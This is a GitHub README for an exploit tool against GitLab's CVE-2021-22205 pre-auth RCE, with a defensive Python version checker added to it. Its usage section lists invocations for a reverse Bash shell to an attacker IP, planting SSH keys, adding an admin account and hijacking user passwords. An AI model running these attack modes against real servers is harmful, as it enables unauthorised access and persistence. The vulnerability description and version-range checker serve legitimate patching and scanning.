inspiringz / CVE-2021-22205

Licence: other
GitLab CE/EE Preauth RCE using ExifTool

CVE-2021-22205

GitLab CE/EE Preauth RCE using ExifTool

This project is for learning purposes only. If it infringes anyone's rights, please contact me and I will remove it. DO NOT USE IT ILLEGALLY: if you engage in any illegal activity while using this tool, you bear all the consequences yourself. The developers and contributors of this tool accept no legal or joint liability.

Description

An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab did not properly validate image files before passing them to a file parser (ExifTool, which GitLab Workhorse runs on uploaded images to strip metadata), so a crafted image results in remote command execution on the GitLab host as the user Workhorse runs ExifTool as. The upload endpoint is reachable without credentials, which is why the issue is exploitable pre-auth.

Affected versions (each range is half-open: the second version is the first fixed release):

  • >=11.9, <13.8.8
  • >=13.9, <13.9.6
  • >=13.10, <13.10.3
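The three ranges above are what an inventory or scanning script has to encode, and getting the boundaries wrong (treating 13.8.8, 13.9.6 or 13.10.3 as vulnerable, or 12.x as safe) is a common mistake. The following Python is an added example, not code from the inspiringz project: it parses a GitLab version string as reported by an instance (with or without an `-ee` / `-pre` suffix), decides whether it falls in one of the half-open affected ranges, and names the first fixed release on that branch. The version strings in the demo are constructed inputs.

```python
import re
from typing import Optional, Tuple

# Affected ranges from the advisory, as (first vulnerable, first fixed).
# Each range is half-open: first_bad <= version < first_fixed.
AFFECTED_RANGES = (
    ((11, 9, 0), (13, 8, 8)),
    ((13, 9, 0), (13, 9, 6)),
    ((13, 10, 0), (13, 10, 3)),
)

# Accepts "13.10.2", "13.10.2-ee", "v13.9", "13.9.0-pre"; the trailing
# edition / pre-release tag is ignored because the fix applies to CE and EE alike.
_VERSION_RE = re.compile(r"^\s*v?(\d+)\.(\d+)(?:\.(\d+))?(?:[-.+].*)?$")


def parse_version(text: str) -> Tuple[int, int, int]:
    """Turn a GitLab version string into a (major, minor, patch) tuple."""
    m = _VERSION_RE.match(text)
    if not m:
        raise ValueError(f"unrecognised GitLab version string: {text!r}")
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return int(major), int(minor), int(patch)


def fixed_version_for(text: str) -> Optional[str]:
    """Return the first fixed release on the same branch, or None if not affected."""
    version = parse_version(text)
    for first_bad, first_fixed in AFFECTED_RANGES:
        if first_bad <= version < first_fixed:
            return ".".join(str(part) for part in first_fixed)
    return None


def is_vulnerable(text: str) -> bool:
    """True if the version lies inside any affected range for CVE-2021-22205."""
    return fixed_version_for(text) is not None


def assess(text: str) -> str:
    """One-line verdict suitable for a scan report."""
    fixed = fixed_version_for(text)
    if fixed is None:
        return f"{text}: not affected by CVE-2021-22205"
    return f"{text}: VULNERABLE to CVE-2021-22205, upgrade to >= {fixed}"


if __name__ == "__main__":
    # Constructed sample versions, chosen to sit on both sides of each boundary.
    for sample in ("11.8.10", "11.9.0", "12.10.14-ee", "13.8.7", "13.8.8",
                   "13.9.5", "13.9.6", "13.10.2-ee", "13.10.3", "14.0.0"):
        print(assess(sample))
```

Note that a version between fixed releases of different branches (for example 13.8.9, which is above 13.8.8 but below 13.9.0) is correctly reported as not affected, which is why the ranges must be checked as tuples rather than with a single "less than 13.10.3" comparison.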

Features

  • GitLab version detection through the hash of the Webpack manifest.json

  • Automatic out-of-band interaction via DNSLog and PostBin / RequestBin

  • Reverse Bash shell, and appending an SSH key to authorized_keys

  • Modifying a GitLab user's password and restoring the original one afterwards

Usage

🐚 ››› python CVE-2021-22205.py

      ░░░░▐▐░░░  CVE-2021-22205
 ▐  ░░░░░▄██▄▄  GitLab CE/EE Unauthenticated RCE using ExifTool
  ▀▀██████▀░░  Affecting all versions starting from 11.9
  ░░▐▐░░▐▐░░  security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild
 ▒▒▒▐▐▒▒▐▐▒  github.com/inspiringz/CVE-2021-22205

Usage:
    python3 CVE-2021-22205.py -u site_url -m detect        # gitlab version & vuln detect
    python3 CVE-2021-22205.py -u site_url -m rce1 'id'     # rce (echo via requestbin oob) 
    python3 CVE-2021-22205.py -u site_url -m rce2 'id'     # rce (echo via write file) *
    python3 CVE-2021-22205.py -u site_url -m rev ip port   # reverse bash shell
    python3 CVE-2021-22205.py -u site_url -m ssh git/root  # append ssh authorized_keys
    python3 CVE-2021-22205.py -u site_url -m add user pass # add manager account *
    python3 CVE-2021-22205.py -u site_url -m mod user      # modify specified user's password => P4ss@GitLab
    python3 CVE-2021-22205.py -u site_url -m rec user      # restore specified user's original password
  • The site_url parameter has the form http[s]://<domain|ip>[:port]/, for example https://example.com:9000/
  • Methods marked with * (rce2, add) are unstable and may not work :(
  • You can modify the script to suit the target environment

Screenshot

Detect: [screenshot]

RCE (echo via RequestBin OOB): [screenshot]

Reverse Bash shell: [screenshot]

Append SSH key to authorized_keys: [screenshot]

GitLab user password modification and restoration: [screenshot]

Reference

  • https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild